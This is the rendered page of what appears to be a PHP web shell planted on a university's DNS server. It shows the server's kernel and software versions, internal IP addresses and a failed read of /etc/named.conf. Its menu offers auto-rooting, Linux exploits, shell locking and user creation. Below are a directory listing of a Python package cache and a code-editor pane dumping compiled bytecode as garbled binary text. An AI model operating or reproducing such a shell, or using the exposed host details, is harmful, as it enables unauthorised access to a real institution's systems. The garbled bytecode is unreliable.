Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
debian /
__pycache__ /
[ HOME SHELL ]
Name
Size
Permission
Action
arfile.cpython-310.pyc
9.79
KB
-rw-r--r--
changelog.cpython-310.pyc
26.91
KB
-rw-r--r--
copyright.cpython-310.pyc
20.59
KB
-rw-r--r--
deb822.cpython-310.pyc
73.79
KB
-rw-r--r--
debfile.cpython-310.pyc
12.91
KB
-rw-r--r--
debian_support.cpython-310.pyc
19.8
KB
-rw-r--r--
debtags.cpython-310.pyc
13.86
KB
-rw-r--r--
deprecation.cpython-310.pyc
1
KB
-rw-r--r--
__init__.cpython-310.pyc
808
B
-rw-r--r--
_util.cpython-310.pyc
10.93
KB
-rw-r--r--
_version.cpython-310.pyc
215
B
-rw-r--r--
watch.cpython-310.pyc
6.33
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : _util.cpython-310.pyc
o �|�a�4 � @ s� d dl Z d dl mZ zd dlmZmZmZmZmZmZm Z m Z mZmZ e d�Z W n ey3 dZ Y nw dd� ZG dd � d e�ZeZd d� ZG dd � d ee �ZG dd� dee �ZG dd� de�ZdS )� N)� ReferenceType) �Iterable�Optional�Generic�Dict�List�Iterator�TypeVar� TYPE_CHECKING�Any�Callable�TFc C s | d ur| � S d S �N� )�refr r �./usr/lib/python3/dist-packages/debian/_util.py�resolve_ref s r c s\ e Zd ZdZddgZer� fdd�Zdd� Zdd � Zd d� Z dd � Z dd� Zdd� Z� Z S )�_CaseInsensitiveStringzCase insensitive string. � str_lower�str_origc s t t| ��|� d| _d| _d S )N� )�superr �__init__r r )�self�s�� __class__r r r s z_CaseInsensitiveString.__init__c C s t �| |�}||_|�� |_|S r )�str�__new__r �lowerr )�cls�str_r r r r r $ s z_CaseInsensitiveString.__new__c C � | j S r )r �r r r r �__str__, � z_CaseInsensitiveString.__str__c C � t | j�S r )�hashr r# r r r �__hash__0 � z_CaseInsensitiveString.__hash__c C s&